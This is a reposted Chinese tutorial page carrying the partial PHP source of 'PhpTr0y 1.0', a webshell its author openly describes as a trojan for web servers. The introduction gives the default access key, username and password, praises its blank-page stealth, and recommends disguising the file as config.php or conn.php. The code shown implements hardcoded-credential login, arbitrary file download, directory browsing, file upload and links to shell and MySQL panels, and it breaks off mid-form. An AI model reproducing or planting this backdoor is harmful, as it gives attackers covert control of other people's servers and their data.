我要投稿
  • 您当前的位置:365bet官方 -> 技术教程 -> 网站建设教程 -> 源码精华 -> 教程内容
  • [ 收藏本页教程 ]
  • PhpTr0y1.0源码精华教程

    教程作者:佚名    教程来源:不详   教程栏目:源码精华    收藏本页
    一个运行在服务端的php文件管理程序,也可以当木马用.借鉴了phpspy一些功能.
    抛弃了传统的认证方式,改用先获取get值再登陆界面的方式.
    如果你运行发现页面空白表示正常,这样隐蔽性会有很大提高.
    默认get值为www.chinahacker.info.默认帐户skyfox.默认密码password9.
    除了打包类没做以外其它的功能也差不多全了,自己没有时间做了,
    其它事也很忙,可能有些bug,如果有的话告诉我,近期没什么时间改.
    这个可能是第一个用xhtml输出的php中文木马了.呵呵.
    为了尽量让文件小点,我去掉了注释.文件大小大约15K.
    如果你需要把文件当作木马用的话,请注意修改文件名称比如.
    config.php
    conn.php
    global.php
    如有其它相关问题请联系我QQ53423398.

    <?
    /*----------------------------------------------------
    Php T-r-0*y 1.0 by 天Fox.
    ZiBo ShanDong China.
    QQ:53423398.
    Email:ooofox@msn.com
    ---------------------------------------------------*/
    error_reporting(7);

    $tr0yname="skyfox";
    $tr0ypass="password9";
    $checkmode['soc']="1";

    if ( !ini_get('register_globals') )
    {
    extract($_POST);
    extract($_GET);
    extract($_SERVER);
    extract($_FILES);
    extract($_ENV);
    extract($_COOKIE);
    if ( isset($_SESSION) )
    {
    extract($_SESSION);
    }
    }
    if ($checkmode['soc']=="1"){
    session_start();

    if ($_GET['get'] == "logout") {
    session_destroy();
    echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
    echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
    exit;
    }
      if ($_SESSION['admin']==$tr0yname && $_SESSION['pass']==$tr0ypass){
      $_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;}else{
      if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
      {
      $_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;
      }else{
      login();
      }
    }
    }
    else
    {

    if ($_GET['get']=="logout"){
    setcookie ("admin", "");
    echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
    echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
    exit;
    }
      if (setcookie ("admin",$tr0ypass,time()+(1*24*3600))){
      setcookie ("admin",$tr0ypass,time()+(1*24*3600));}else{
      if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
      {
      setcookie ("admin",$tr0ypass,time()+(1*24*3600));
      }else{
      login();
      }
    }
    }
    if(!empty($down)) {
      if (!@file_exists($down)) {
      echo "<script>alert('你要下的文件不存在!')</script>";
      } else {
      $filename = basename($down);
      $filename_info = explode('.', $filename);
      $fileext = $filename_info[count($filename_info)-1];
      header('Content-type: application/x-'.$fileext);
      header('Content-Disposition: attachment; filename='.$filename);
      header('Content-Description: PHP Generated Data');
      header('Content-Length: '.filesize($down));
      @readfile($down);
      exit;
      }
    }


    $tr0ypath=str_replace('\\','/',dirname(__FILE__));
    if (!isset($dirs) or empty($dirs)) {
      $dirs = ".";
      $nowpath = getPath($tr0ypath, $dirs);
    } else {
      $dirs=$_GET['dirs'];
      $nowpath = getPath($tr0ypath, $dirs);
    }
    if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
    }

    ?>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "/jishu513556http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
    <html xmlns="/jishu513556http://www.w3.org/1999/xhtml" lang="zh-CN"/>
    <head>
    <title>PhpTr0y bY 天Fox <? echo "当前系统: ".PHP_OS.""?></title>
    <meta http-equiv=Content-Language content="text/html; charset=gb2312" />
    <style type="text/css">
    body{margin:0px;PADDING:0px;font-family:"Tahoma", Verdana, Lucida, Arial, Helvetica, 宋体,sans-serif;color:#FFF;font-size:12px;background:#677D92 left top;}
    #title{margin:0px;padding:0px 0px 0px 0px;background:#8C0700;width:606px;LINE-HEIGHT:18px;}
    #body{margin:0px;padding:0px 0px 0px 0px;width:600px;color:#FFF;background:#556B80;LINE-HEIGHT:150%;text-align:left;border:#768CA3 3px solid;}
    #action{width:601px;color:#FFF;padding:0px 0px 0px 5px;background:#8C0700;text-align:left;}
    a:link{font-weight:normal;text-decoration:none;color:#FFF;}
    a:visited {font-weight:normal;text-decoration:none;color:#FFF;}
    a:hover {font-weight:normal;text-decoration:none;color:#FFF;}
    a:active {font-weight:normal;text-decoration:none;color:#FFF;}
    form{margin:0}
    select {background-color: #ffffff; color: #000000; font-size: 12px; border: 0px #cccccc double}
    input,textarea {background-color: #ffffff; color: #000000; font-family: tahoma; font-size: 12px; border: 1px #cccccc double;}
    option {font-size: 12px; background-color: #f3f3f3; color: #51485f;}
    </style>
    <SCRIPT language=JavaScript>
    function CheckAll(form)
    {
      for (var i=0;i<form.elements.length;i++)
      {
        var e = form.elements[i];
        if (e.name != 'selectall')
        e.checked = form.selectall.checked;
    }
    }
    </SCRIPT>
    </head>
    <body>
    <div align="center">
    <div id="title"><a href="http://www.chinahacker.info/" target="new"><b>PhpTr0y1.0</b></a>&nbsp;&nbsp;<a href="<?=$_SERVER['PHP_SELF']?>"><b>返回根目录</b></a>&nbsp;&nbsp;<a href="?get=logout"><b>退出</b></a>&nbsp;&nbsp;<a href="?dir=phpinfo" target="new"><b>Phpinfo()</b></a>&nbsp;&nbsp;<a
    href="?dir=shell"><b>Webshell</b></a>&nbsp;&nbsp;<a href="?dir=mysql"><b>Mysql</b></a></div><br />
    <div id="body"><div align="left">当前目录位置:<?=$nowpath?>/<br />程序所在位置:<?=$tr0ypath?>/<br />
      <form action="" method="get">跳转到指定目录:<input name="dirs" type="text" /><input type="submit" name="dirs" value="确定" /></form>
      <form action="" method="post" enctype="multipart/form-data">上传文件到当前位置:<input name="uploadfiles" type="file" /><input

    type="submit" name="uploadfile" value="确定"><input type="hi
    我要投稿   -   广告合作   -   关于本站   -   友情连接   -   网站地图   -   联系我们   -   版权声明   -   设为首页   -   加入收藏   -   网站留言
    Copyright © 2009 - 20012 www.www.ct131.com All Rights Reserved.365bet官方 版权所有